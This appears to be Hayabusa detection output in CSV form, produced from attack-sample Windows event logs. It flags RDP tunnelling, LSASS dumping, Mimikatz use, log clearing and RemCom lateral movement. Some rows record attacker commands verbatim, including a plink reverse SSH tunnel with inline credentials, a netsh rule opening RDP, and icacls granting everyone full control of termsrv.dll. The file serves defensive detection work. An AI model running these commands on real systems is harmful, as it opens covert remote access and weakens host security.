2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:43.171 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01  :  LogonID: 0x14871d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:57.442 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01  :  LogonID: 0x148f5d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,informational,Logon Type 10 - RDP (Remote Interactive),User: admin01  :  Workstation: PC01  :  IP Address: 127.0.0.1  :  Port: 49274  :  LogonID: 0x14a321  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$  :  Target User: admin01  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,high,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,low,Admin User Remote Logon,,rules/sigma/builtin/security/win_admin_rdp_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01  :  LogonID: 0x14a321,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: plink.exe  10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test  :  Path: C:\Users\IEUser\Desktop\plink.exe  :  User: PC01\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,high,Suspicious Plink Remote Forwarding,,rules/sigma/process_creation/sysmon_susp_plink_remote_forward.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,medium,Exfiltration and Tunneling Tools Execution,,rules/sigma/process_creation/win_exfiltration_and_tunneling_tools_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:03:48.058 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: PC01\IEUser  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.141 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c   :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.151 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  :  Path: C:\Windows\System32\csrss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.221 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe  :  Path: C:\Windows\System32\winlogon.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.351 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c   :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  :  Path: C:\Windows\System32\csrss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.962 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe  :  Path: C:\Windows\System32\winlogon.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.283 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.563 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\TSTheme.exe -Embedding  :  Path: C:\Windows\System32\TSTheme.exe  :  User: PC01\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:26.499 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe  :  Path: C:\Windows\System32\AtBroker.exe  :  User: PC01\IEUser  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:06:38.843 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0)  :  Path: C:\Windows\System32\taskhost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: System32\RemComSvc.exe  :  IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: System32\RemComSvc.exe  :  IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: System32\RemComSvc.exe  :  IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: System32\RemComSvc.exe  :  IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: System32\RemComSvc.exe  :  IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: System32\RemComSvc.exe  :  IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\System32\RemComSvc.exe  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\System32\RemComSvc.exe  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\System32\RemComSvc.exe  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\System32\RemComSvc.exe  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\System32  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\System32  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\System32  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\System32  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\System32\RemComSvc.exe  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-02-17 03:19:18.522 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\System32\RemComSvc.exe  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
2019-03-18 04:09:41.328 +09:00,PC04.example.corp,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
2019-03-18 04:10:03.991 +09:00,PC04.example.corp,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
2019-03-18 04:26:42.116 +09:00,PC04.example.corp,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/net_share_drive_5142.evtx
2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx
2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx
2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx
2019-03-18 05:17:52.949 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat""   :  Path: C:\Windows\System32\cmd.exe  :  User: PC04\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:17:52.979 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst""  -i -o  :  Path: C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe  :  User: PC04\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:18:05.086 +09:00,PC04.example.corp,13,high,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,RDP Registry Modification,,rules/sigma/registry_event/sysmon_rdp_registry_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: netsh advfirewall firewall add rule name=""Remote Desktop"" dir=in protocol=tcp localport=3389 profile=any action=allow  :  Path: C:\Windows\System32\netsh.exe  :  User: PC04\IEUser  :  Parent Command: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst""  -i -o",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,medium,Netsh Port or Application Allowed,,rules/sigma/process_creation/win_netsh_fw_add.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,high,Netsh RDP Port Opening,,rules/sigma/process_creation/win_netsh_allow_port_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:18:09.643 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding  :  Path: C:\Windows\System32\rundll32.exe  :  User: PC04\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:18:12.096 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: PC04\IEUser  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:20:14.512 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe""   :  Path: C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe  :  User: PC04\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:20:17.907 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\takeown.exe"" /f  C:\Windows\System32\termsrv.dll  :  Path: C:\Windows\System32\takeown.exe  :  User: PC04\IEUser  :  Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant %%username%%:F  :  Path: C:\Windows\System32\icacls.exe  :  User: PC04\IEUser  :  Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,medium,File or Folder Permissions Modifications,,rules/sigma/process_creation/win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant *S-1-1-0:(F)  :  Path: C:\Windows\System32\icacls.exe  :  User: PC04\IEUser  :  Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,medium,File or Folder Permissions Modifications,,rules/sigma/process_creation/win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:23:12.188 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: PC04\IEUser  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:43:12.784 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: PC04\IEUser  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx
2019-03-18 05:43:16.309 +09:00,PC04.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding  :  Path: C:\Windows\System32\slui.exe  :  User: PC04\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx
2019-03-18 20:06:25.485 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
